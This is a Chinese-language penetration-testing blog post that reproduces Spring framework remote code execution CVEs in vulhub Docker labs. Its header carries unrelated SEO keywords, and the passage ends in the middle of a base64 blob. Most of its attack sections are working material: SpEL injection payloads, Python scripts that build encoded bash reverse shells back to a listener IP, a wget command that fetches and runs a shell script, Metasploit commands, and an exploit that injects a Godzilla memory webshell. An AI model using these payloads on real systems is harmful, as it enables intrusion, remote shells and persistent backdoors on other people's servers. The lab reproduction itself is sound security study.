计算科学与学习网站建设与实施,dedecms学校网站模板免费下载,上海网站建设公司哪个好,青岛航拍公司目录 什么是spring区分Spring与Struts2框架的几种新方法CVE-2016-4977#xff1a;Spring Security OAuth2 远程命令执行漏洞漏洞介绍 环境准备漏洞发现漏洞验证 利用1利用2 CVE-2017-4971#xff1a;Pivotal Spring Web Flow 远程代码执行漏洞漏洞介绍 环境… 目录 什么是spring区分Spring与Struts2框架的几种新方法CVE-2016-4977Spring Security OAuth2 远程命令执行漏洞漏洞介绍 环境准备漏洞发现漏洞验证 利用1利用2 CVE-2017-4971Pivotal Spring Web Flow 远程代码执行漏洞漏洞介绍 环境准备漏洞发现漏洞验证 利用 CVE-2017-8046Pivotal Spring Data REST 远程代码执行漏洞漏洞介绍 环境准备漏洞发现漏洞验证漏洞利用 CVE-2018-1270Spring Framework spring-Messaging 远程代码执行漏洞漏洞介绍 环境准备漏洞发现漏洞验证漏洞利用 CVE-2018-1273Spring Data Commons远程代码执行漏洞漏洞介绍 环境准备漏洞发现漏洞验证漏洞利用 CVE-2022-22947Spring Cloud Gateway 远程代码执行漏洞漏洞介绍 环境准备漏洞发现Nuclei✅SpringBoot-Scan✅SpringBootExploit❌Spring_All_Reachable✅MSF❌第三方工具1命令执行✅第三方工具2直接哥斯拉✅ 漏洞验证 CVE-2022-22963Spring Cloud Function远程代码执行漏洞漏洞介绍 环境准备漏洞发现Nuclei✅SpringBoot-Scan✅SpringBootExploit❌Spring_All_Reachable✅MSF✅第三方工具1命令执行✅第三方工具2反弹shell✅ 漏洞验证 利用 CVE-2022-22965**Spring4Shell**漏洞介绍 环境准备漏洞发现Nuclei✅SpringBoot-Scan✅MSF❌第三方工具1检测漏洞✅第三方工具2利用漏洞✅第三方工具3利用漏洞✅ 漏洞验证 利用警告其他 CVE-2022-22978VMware Spring Security 身份认证绕过漏洞漏洞介绍 环境准备漏洞发现Nuclei✅第三方工具1检测漏洞✅ 漏洞验证 利用 参考 什么是spring
Spring 框架是一个功能强大的 Java 应用程序框架旨在提供高效且可扩展的开发环境。其本身也是模块化的应用程序可以选择所需要的模块。这些模块缩短应用程序的开发时间提高了应用开发的效率例如在Java Web开发的早 期阶段程序员需要编写大量的代码来将记录插入到数据库中。但是通过使用Spring JDBC模块的 JDBCTemplate我们可以将操作简化为几行代码所以spring应用十分广泛漏洞较为常见必须掌握。
spring有五个非常关键的部分分别是 Spring framework 、springboot 、spring cloud 、spring secutiry、spring mvc。其中的spring framework 就是大家经常提到的spring是所有spring内容最基本的底层架构其中包含spring mvcspringbootIOC和AOP等等。Spring mvc就是spring中的一个MVC框架主要用来开发web应用和网络接口但是其使用之前需要配置大量的xml文件比较繁琐所以出现了springboot其内置tomcat并且内置默认的XML配置信息从而方便了用户的使用它们之间的关系如下。
区分Spring与Struts2框架的几种新方法
参见https://blog.csdn.net/m0_71692682/article/details/125217602
CVE-2016-4977Spring Security OAuth2 远程命令执行漏洞
漏洞介绍 环境准备
**漏洞原理**Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时由于使用了Springs Expression Language (SpEL)攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 **利用条件**利用此漏洞需低权限 影响范围
Pivotal Spring_Security_Oauth 2.0.2
Pivotal Spring_Security_Oauth 2.0.5
Pivotal Spring_Security_Oauth 1.0.5
Pivotal Spring_Security_Oauth 2.0.6
Pivotal Spring_Security_Oauth 1.0.4
Pivotal Spring_Security_Oauth 2.0.9
Pivotal Spring_Security_Oauth 2.0.1
Pivotal Spring_Security_Oauth 1.0.1
Pivotal Spring_Security_Oauth 1.0.3
Pivotal Spring_Security_Oauth 1.0.2
Pivotal Spring_Security_Oauth 2.0.3
Pivotal Spring_Security_Oauth 2.0.0
Pivotal Spring_Security_Oauth 1.0.0
Pivotal Spring_Security_Oauth 2.0.7
Pivotal Spring_Security_Oauth 2.0.4
Pivotal Spring_Security_Oauth 2.0.8修复方式目前官方已有可更新版本建议受影响用户升级至最新版本。 参考链接https://ti.qianxin.com/vulnerability/detail/3927#patch-file 漏洞复现参考https://blog.csdn.net/zy15667076526/article/details/111413892 环境搭建
cd vulhub-master/spring/CVE-2016-4977
docker-compose up -d
docker ps
docker-compose down漏洞发现
专用扫描工具无一发现涉及到的工具在下文会有介绍
漏洞验证 利用1
访问http://your-ip:8080/oauth/authorize?response_type${233*233}client_idacmescopeopenidredirect_urihttp://test。首先需要填写用户名和密码我们这里填入admin:admin即可。 可见我们输入是SpEL表达式${233*233}已经成功执行并返回结果 然后我们使用poc.py来生成反弹shell的POC注意Java反弹shell的限制与绕过方式
构造反弹shell的命令
bash -i /dev/tcp/192.168.229.128/6666 01得到命令
bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}借助POC生成反弹shell的命令 终极POC
http://your-ip:8080/oauth/authorize?response_type上面的那一长串POCclient_idacmescopeopenidredirect_urihttp://test也就是浏览器访问
http://192.168.229.140:8080/oauth/authorize?response_type${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(70)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(90)).concat(T(java.lang.Character).toString(71)).concat(T(java.lang.Character).toString(86)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(51)).concat(T(java.lang.Character).toString(82)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(121)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(80)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(54)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(125)))}client_idacmescopeopenidredirect_urihttp://test利用2
根据https://www.freebuf.com/articles/web/322376.html 提出了一个优化后的poc
#!/usr/bin/env python
import base64
message input(Enter message to encode:)
message bash -c {echo,%s}|{base64,-d}|{bash,-i} % bytes.decode(base64.b64encode(message.encode(utf-8)))
print(message)
poc ${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s) % ord(message[0])
for ch in message[1:]:poc .concat(T(java.lang.Character).toString(%s)) % ord(ch)
poc )}
print(poc)成功反弹shell
CVE-2017-4971Pivotal Spring Web Flow 远程代码执行漏洞
漏洞介绍 环境准备
**漏洞原理**Spring WebFlow 是一个适用于开发基于流程的应用程序的框架如购物逻辑可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中如果我们控制了数据绑定时的field将导致一个SpEL表达式注入漏洞最终造成任意命令执行。 影响范围
Pivotal Spring_Web_Flow 2.4.0
Pivotal Spring_Web_Flow 2.4.4
Pivotal Spring_Web_Flow 2.4.2
Pivotal Spring_Web_Flow 2.4.1修复方式目前官方已有可更新版本建议受影响用户升级至最新版本。 参考链接https://ti.qianxin.com/vulnerability/detail/16281 漏洞复现参考https://blog.csdn.net/zy15667076526/article/details/111413941 环境搭建
cd vulhub-master/spring/CVE-2017-4971
docker-compose up -d
docker ps
docker-compose down漏洞发现
专用扫描工具无一发现涉及到的工具在下文会有介绍
漏洞验证 利用
访问id为1的酒店http://your-ip:8080/hotels/1点击预订按钮“Book Hotel”填写相关信息后点击“Process”从这一步其实WebFlow就正式开始了 根据提示的账号密码登录系统 此时抓包抓到一个POST数据包我们向其中添加一个字段也就是反弹shell的POC 一定注意这个是有csrf的token的
原POC:
_(new java.lang.ProcessBuilder(bash,-c,bash -i /dev/tcp/10.0.0.1/21 01)).start()vulhubURL编码后由于此处不是重放可以不做URL编码工具会自动编码
_(new java.lang.ProcessBuilder(bash,-c,bash-i%26/dev/tcp/192.168.229.128/8888 0%261)).start()vulhubCVE-2017-8046Pivotal Spring Data REST 远程代码执行漏洞
漏洞介绍 环境准备
**漏洞原理**Spring Data REST是一个构建在Spring Data之上为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中实现RFC6902path的值被传入setValue导致执行了SpEL表达式触发远程命令执行漏洞。 影响范围
Pivotal_Software Spring_Data_Rest 2.6.9
VMware Spring_Boot 2.0.0
VMware Spring_Boot 1.5.9
Pivotal_Software Spring_Data_Rest 3.0.0修复方式目前官方已有可更新版本建议受影响用户升级至最新版本。 参考链接https://ti.qianxin.com/vulnerability/detail/7347 环境搭建
cd vulhub-master/spring/CVE-2017-8046
docker-compose up -d
docker ps
docker-compose down看到 json格式的返回值说明这是一个 Restful风格的API服务器 restful是一种软件架构风格、设计风格而不是标准只是提供了一组设计原则和约束条件。它主要用于客户端和服务器交互类的软件。基于这个风格设计的软件可以更简洁更有层次更易于实现缓存等机制。restful关键是定义可表示流程元素/资源的对象。在REST中每一个对象都是通过URL来表示的对象用户负责将状态信息打包进每一条消息内以便对象的处理总是无状态的。 漏洞发现
专用扫描工具无一发现涉及到的工具在下文会有介绍
漏洞验证
验证漏洞是否存在访问http://your-ip:8080/customers/1 看到一个资源。我们使用PATCH请求来修改之
PATCH /customers/1 HTTP/1.1
Host: 192.168.229.140:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patchjson
Content-Length: 200[{ op: replace, path: T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname, value: vulhub }]path的值是SpEL表达式发送上述数据包将执行new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}表示的命令touch /tmp/success。 然后进入容器docker exec -it 256a958af3aa bash看看可见success成功创建。
漏洞利用
对文本进行base64编码https://www.iamwawa.cn/base64.html
bash -i /dev/tcp/192.168.229.128/6666 01bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i},.join(map(str, (map(ord,bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}))))代码优化这里写了一个脚本
#!/usr/bin/env python
import base64message input(输入要执行的命令如bash -i /dev/tcp/192.168.229.128/6666 01)
message bash -c {echo,%s}|{base64,-d}|{bash,-i} % bytes.decode(base64.b64encode(message.encode(utf-8)))
print(message\n)payload message.encode(utf-8)
bytecode ,.join(str(i) for i in list(payload))
print(bytecode)CVE-2018-1270Spring Framework spring-Messaging 远程代码执行漏洞
漏洞介绍 环境准备
**漏洞原理**spring messaging为spring框架提供消息支持其上层协议是STOMP底层通信基于SockJS在spring messaging中其允许客户端订阅消息并使用selector过滤消息。selector用SpEL表达式编写并使用StandardEvaluationContext解析造成命令执行漏洞。 影响范围
Oracle Retail_Open_Commerce_Platform 5.3.0
Oracle Retail_Xstore_Point_Of_Service 7.1
Oracle Retail_Predictive_Application_Server 15.0
Oracle Insurance_Calculation_Engine 10.2
Oracle Health_Sciences_Information_Manager 3.0
Oracle Retail_Predictive_Application_Server 16.0
Redhat Fuse 1.0.0
Oracle Primavera_Gateway 16.2
Oracle Retail_Integration_Bus 14.1.2
Oracle Goldengate_For_Big_Data 12.3.1.1
Oracle Retail_Integration_Bus 16.0.1
Oracle Application_Testing_Suite 12.5.0.3
Oracle Retail_Open_Commerce_Platform 6.0.1
Oracle Healthcare_Master_Person_Index 3.0
Oracle Communications_Converged_Application_Server 7.0.0.1
Oracle Retail_Order_Broker 15.0
Oracle Retail_Point-Of-Sale 14.1
Oracle Service_Architecture_Leveraging_Tuxedo 12.2.2.0.0
Oracle Insurance_Calculation_Engine 10.1.1
Oracle Retail_Integration_Bus 14.0.4
Oracle Retail_Order_Broker 5.2
Oracle Tape_Library_Acsls 8.4
Oracle Retail_Back_Office 14.0
Oracle Retail_Predictive_Application_Server 14.0
Oracle Retail_Customer_Insights 16.0
Oracle Retail_Order_Broker 16.0
Oracle Service_Architecture_Leveraging_Tuxedo 12.1.3.0.0
Oracle Application_Testing_Suite 13.3.0.1
Oracle Insurance_Rules_Palette 10.1
5.0.0 VMware Spring_Framework 5.0.5
Oracle Retail_Integration_Bus 15.0.0.1
VMware Spring_Framework 4.3.16
Oracle Insurance_Rules_Palette 11.1
Oracle Retail_Central_Office 14.1
Debian Debian_Linux 9.0
Oracle Primavera_Gateway 15.2
Oracle Application_Testing_Suite 13.1.0.1
Oracle Application_Testing_Suite 13.2.0.1
Oracle Retail_Integration_Bus 14.1.1
Oracle Retail_Customer_Insights 15.0
Oracle Retail_Integration_Bus 16.0
Oracle Retail_Integration_Bus 15.0.2
Oracle Retail_Open_Commerce_Platform 6.0.0
Oracle Goldengate_For_Big_Data 12.3.2.1
Oracle Insurance_Calculation_Engine 10.2.1
Oracle Retail_Integration_Bus 14.0.3
Oracle Retail_Integration_Bus 15.0.1
Oracle Retail_Back_Office 14.1
Oracle Insurance_Rules_Palette 11.0
Oracle Retail_Returns_Management 14.1
Oracle Retail_Integration_Bus 14.1.3
Oracle Enterprise_Manager_Ops_Center 12.2.2
Oracle Communications_Services_Gatekeeper 6.1.0.4.0
Oracle Insurance_Rules_Palette 10.2
Oracle Communications_Diameter_Signaling_Router 8.3
Oracle Big_Data_Discovery 1.6.0
Oracle Communications_Performance_Intelligence_Center 10.2.1
Oracle Retail_Integration_Bus 14.0.1
Oracle Retail_Order_Broker 5.1
Oracle Retail_Returns_Management 14.0
Oracle Retail_Integration_Bus 14.0.2
Oracle Insurance_Rules_Palette 10.0
Oracle Enterprise_Manager_Ops_Center 12.3.3
Oracle Healthcare_Master_Person_Index 4.0
Oracle Goldengate_For_Big_Data 12.2.0.1
Oracle Primavera_Gateway 17.12
Oracle Retail_Predictive_Application_Server 14.1
Oracle Retail_Point-Of-Sale 14.0
Oracle Retail_Central_Office 14.0
Oracle Retail_Integration_Bus 16.0.2修复方式目前官方已有可更新版本建议受影响用户升级至最新版本。 参考链接https://ti.qianxin.com/vulnerability/detail/13375 漏洞复现参考https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1270 环境搭建
cd vulhub-master/spring/CVE-2018-1270
docker-compose up -d
docker ps
docker-compose down漏洞发现
专用扫描工具无一发现涉及到的工具在下文会有介绍
漏洞验证
网上大部分文章都说spring messaging是基于websocket通信其实不然。spring messaging是基于sockjs可以理解为一个通信协议而sockjs适配多种浏览器现代浏览器中使用websocket通信老式浏览器中使用ajax通信。 连接后端服务器的流程可以理解为
用STOMP协议将数据组合成一个文本流用sockjs协议发送文本流sockjs会选择一个合适的通道websocket或xhr(http)与后端通信
所以我们可以使用http来复现漏洞称之为“降维打击”。 我编写了一个简单的POC脚本exploit.py需要用python3.6执行因为该漏洞是订阅的时候插入SpEL表达式而对方向这个订阅发送消息时才会触发所以我们需要指定的信息有
基础地址在vulhub中为http://your-ip:8080/gs-guide-websocket待执行的SpEL表达式如T(java.lang.Runtime).getRuntime().exec(touch /tmp/success)某一个订阅的地址如vulhub中为/topic/greetings如何触发这个订阅即如何让后端向这个订阅发送消息。在vulhub中我们向/app/hello发送一个包含name的json即可触发这个事件。当然在实战中就不同了所以这个poc并不具有通用性。
根据你自己的需求修改POC。如果是vulhub环境你只需修改1中的url即可。 首先访问靶机/gs-guide-websocket 验证漏洞是否存在下载相关POC脚本exploit.py exploit.py 然后进入容器docker exec -it 7880690e000f bash看看可见success成功创建。
漏洞利用
生成反弹shell的命令对文本进行base64编码https://www.iamwawa.cn/base64.html
bash -i /dev/tcp/192.168.229.128/6666 01bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}简单的修改以下利用脚本 利用成功
CVE-2018-1273Spring Data Commons远程代码执行漏洞
漏洞介绍 环境准备
**漏洞原理**Spring Data是一个用于简化数据库访问并支持云服务的开源框架Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中存在一处SpEL表达式注入漏洞攻击者可以注入恶意SpEL表达式以执行任意命令。 影响范围
3.0 Pivotal_Software Spring_Data_Rest 3.0.5
1.13 Pivotal_Software Spring_Data_Commons 1.13.10
1.0.0 Apache Ignite 2.5.0
Apache Ignite 1.0.0
Pivotal_Software Spring_Data_Rest 2.5.10
Pivotal_Software Spring_Data_Commons 1.12.10
2.0 Pivotal_Software Spring_Data_Commons 2.0.5
2.6 Pivotal_Software Spring_Data_Rest 2.6.10修复方式目前官方已有可更新版本建议受影响用户升级至最新版本。 参考链接https://ti.qianxin.com/vulnerability/detail/13375 漏洞复现参考https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1273 环境搭建
cd vulhub-master/spring/CVE-2018-1273
docker-compose up -d
docker ps
docker-compose down漏洞发现
专用扫描工具无一发现涉及到的工具在下文会有介绍
漏洞验证
环境启动后访问http://your-ip:8080/users将可以看到一个用户注册页面。 在注册的时候抓包并修改成如下数据包
POST /users?pagesize5 HTTP/1.1
Host: 192.168.229.140:8080
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/webp,image/apng,*/*;q0.8
Referer: http://localhost:8080/users?page0size5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q0.9,en;q0.8
Connection: keep-aliveusername[#this.getClass().forName(java.lang.Runtime).getRuntime().exec(touch /tmp/success)]passwordrepeatedPassword然后进入容器docker exec -it 11544b58b4ab bash看看可见success成功创建。
漏洞利用
执行命令下载利用脚本
bash -i /dev/tcp/192.168.229.128/6666 01
python -m http.server 80wget -qO /tmp/1 http://192.168.229.128/shell.sh执行恶意脚本成功反弹shell
/bin/bash /tmp/1CVE-2022-22947Spring Cloud Gateway 远程代码执行漏洞
漏洞介绍 环境准备
**漏洞原理**Spring Cloud Gateway 是 Spring Cloud 下的一个项目该项目是基于 Spring 5.0、Spring Boot 2.0 和 Project Reactor 等技术开发的网关它旨在为微服务架构提供一种简单有效、统一的 API 路由管理方式。 影响范围
Spring Cloud Gateway 3.1.0
3.0.0 Spring Cloud Gateway 3.0.6
Spring Cloud Gateway 其他老版本也受影响参考链接https://ti.qianxin.com/vulnerability/detail/238521 漏洞复现参考https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md 环境搭建
cd vulhub-master/spring/CVE-2022-22947
docker-compose up -d
docker ps
docker-compose down漏洞发现
Nuclei✅ SpringBoot-Scan✅
项目地址https://github.com/AabyssZG/SpringBoot-Scan 执行命令
python ./SpringBoot-Scan.py -v http://192.168.229.140:8080/
-v --vul 对单一URL进行漏洞利用SpringBootExploit❌
项目地址https://github.com/0x727/SpringBootExploit 从releases下载最新版Spring Boot Exploit压缩包配合JNDIExploit使用。⭐推荐 工具使用参见https://www.ddosi.org/springbootexploit/ 爆破利用链失败
Spring_All_Reachable✅
项目地址https://github.com/savior-only/Spring_All_Reachable 命令执行与内存马都执行成功。
MSF❌
漏洞应该是存在的但是利用失败了
search CVE-2022-22947
use exploit/linux/http/spring_cloud_gateway_rce
set RHOSTS 192.168.229.140
set LHOST 192.168.229.128
set RPORT 8080
exploit第三方工具1命令执行✅
来源地址https://github.com/d-rn/vulBox/blob/main/cve_2022_22947.py 使用时候测试地址的末尾不要跟斜线。工具会自动删除恶意路由。cve_2022_22947.py
第三方工具2直接哥斯拉✅
exp.py 源代码如下使用时候测试地址的末尾不要跟斜线
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
import syspayload{id: hacktest,filters: [{name: AddResponseHeader,args: {name: Result,value: #{T(org.springframework.cglib.core.ReflectUtils).defineClass(ms.GMemShell,T(org.springframework.util.Base64Utils).decodeFromString(yv66vgAAADQBeAoADQC2BwC3CgACALYJABIAuAoAAgC5CQASALoKAAIAuwoAEgC8CQASAL0KAA0AvggAcgcAvwcAwAcAwQcAwgoADADDCgAOAMQHAMUIAJ8HAMYHAMcKAA8AyAsAyQDKCgASALYKAA4AywgAzAcAzQoAGwDOCADPBwDQBwDRCgDSANMKANIA1AoAHgDVBwDWCACBBwCECQDXANgKANcA2QgA2goA2wDcBwDdCgAVAN4KACoA3woA2wDgCgDbAOEIAOIKAOMA5AoAFQDlCgDjAOYHAOcKAOMA6AoAMwDpCgAzAOoKABUA6wgA7AoADADtCADuCgAMAO8IAPAIAPEKAAwA8ggA8wgA9AgA9QgA9ggA9wsAFAD4EgAAAP4KAP8BAAcBAQkBAgEDCgBHAQQKABsBBQsBBgEHCgASAQgKABIBCQkAEgEKCAELCwEMAQ0KABIBDgsBDAEPCAEQBwERCgBUALYKAA0BEgoAFQETCgANALsKAFQBFAoAEgEVCgAVARYKAP8BFwcBGAoAXQC2CABlCAEZAQAFc3RvcmUBAA9MamF2YS91dGlsL01hcDsBAAlTaWduYXR1cmUBADVMamF2YS91dGlsL01hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDsOwEABHBhc3MBABJMamF2YS9sYW5nL1N0cmluZzsBAANtZDUBAAJ4YwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAOTG1zL0dNZW1TaGVsbDsBAAhkb0luamVjdAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAVcmVnaXN0ZXJIYW5kbGVyTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA5leGVjdXRlQ29tbWFuZAEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAANtc2cBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADb2JqAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEcGF0aAEADVN0YWNrTWFwVGFibGUHAM0HAMcBABBNZXRob2RQYXJhbWV0ZXJzAQALZGVmaW5lQ2xhc3MBABUoW0IpTGphdmEvbGFuZy9DbGFzczsBAApjbGFzc2J5dGVzAQACW0IBAA51cmxDbGFzc0xvYWRlcgEAGUxqYXZhL25ldC9VUkxDbGFzc0xvYWRlcjsBAAZtZXRob2QBAApFeGNlcHRpb25zAQABeAEAByhbQlopW0IBAAFjAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQABcwEAAW0BAAFaBwDFBwEaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAA3JldAEADGJhc2U2NEVuY29kZQEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAdFbmNvZGVyAQAGYmFzZTY0AQARTGphdmEvbGFuZy9DbGFzczsBAAJicwEABXZhbHVlAQAMYmFzZTY0RGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RlY29kZXIBAANjbWQBAF0oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTspTG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eTsBAAxidWZmZXJTdHJlYW0BAAJleAEABXBkYXRhAQAyTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTsBABlSdW50aW1lVmlzaWJsZUFubm90YXRpb25zAQA1TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9Qb3N0TWFwcGluZzsBAAQvY21kAQANbGFtYmRhJGNtZCQxMQEARyhMb3JnL3NwcmluZ2ZyYW1ld29yay91dGlsL011bHRpVmFsdWVNYXA7KUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87AQAGYXJyT3V0AQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEAAWYBAAJpZAEABGRhdGEBAChMb3JnL3NwcmluZ2ZyYW1ld29yay91dGlsL011bHRpVmFsdWVNYXA7AQAGcmVzdWx0AQAZTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwcAtwEACDxjbGluaXQAQAKU291cmNlRmlsZQEADkdNZW1TaGVsbC5qYXZhDABpAGoBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwAZQBmDAEbARwMAGgAZgwBHQEeDABnAJIMAGcAZgwBHwEgAQAPamF2YS9sYW5nL0NsYXNzAQAQamF2YS9sYW5nL09iamVjdAEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAQW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvDAEhASIMASMBJAEADG1zL0dNZW1TaGVsbAEAMG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZQEAEGphdmEvbGFuZy9TdHJpbmcMASUBKAcBKQwBKgErDAEsAS0BAAJvawEAE2phdmEvbGFuZy9FeGNlcHRpb24MAS4AagEABWVycm9yAQAXamF2YS9uZXQvVVJMQ2xhc3NMb2FkZXIBAAxqYXZhL25ldC9VUkwHAS8MATABMQwBMgEzDABpATQBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHATUMATYAmQwBNwE4AQADQUVTBwEaDAE5AToBAB9qYXZheC9jcnlwdG8vc3BlYy9TZWNyZXRLZXlTcGVjDAE7ATwMAGkBPQwBPgE/DAFAAUEBAANNRDUHAUIMATkBQwwBRAFFDAFGAUcBABRqYXZhL21hdGgvQmlnSW50ZWdlcgwBSAE8DABpAUkMAR0BSgwBSwEeAQAQamF2YS51dGlsLkJhc2U2NAwBTAFNAQAKZ2V0RW5jb2RlcgwBTgEiAQAOZW5jb2RlVG9TdHJpbmcBABZzdW4ubWlzYy5CQVNFNjRFbmNvZGVyDAFPAVABAAZlbmNvZGUBAApnZXREZWNvZGVyAQAGZGVjb2RlAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcgEADGRlY29kZUJ1ZmZlcgwBUQFSAQAQQm9vdHN0cmFwTWV0aG9kcw8G